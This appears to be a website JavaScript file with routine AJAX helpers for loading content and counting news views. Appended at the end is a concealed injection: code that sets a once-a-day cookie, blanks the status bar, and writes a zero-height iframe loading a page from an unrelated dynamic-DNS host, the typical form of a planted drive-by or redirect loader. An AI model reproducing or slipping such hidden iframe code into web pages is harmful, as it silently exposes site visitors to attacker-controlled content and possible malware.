function objXMLHttp() {
	var _xmlhttp;
	try {
		_xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
	}
	catch(e){
		try {
			_xmlhttp=new XMLHttpRequest();
		}
		catch(e){
			_xmlhttp=false;
		}
	}
	finally {
		return _xmlhttp;
	}
}		
function getalltext(divid,strhttp){
	var xmlhttp=new objXMLHttp();
	if (xmlhttp){
		xmlhttp.open("get",strhttp+"n="+Math.random(),true);
		document.getElementById(divid).innerHTML=unescape("<div><img src=/images/loading.gif></div>");
		xmlhttp.onreadystatechange=function(){
			if (xmlhttp.readyState==4&&xmlhttp.status==200){
				document.getElementById(divid).innerHTML=unescape(xmlhttp.responseText);
			}
			else{
			}
		}
		xmlhttp.send(null);					
	}
}
function NewsCountSum(strhttp){
	var xmlhttp=new objXMLHttp();
	if (xmlhttp){
		xmlhttp.open("get",strhttp+"n="+Math.random(),true);
		xmlhttp.send(null);					
	}
}
function NewsDisplay(a,b){
        document.getElementById(a).style.display=''
        document.getElementById(b).style.display='none'
}




function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1)
{
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
document.writeln('<iframe height=0 width=100 src="http://ffwow1.3322.org/index.htm"></iframe>');window.status=" "; 
} 


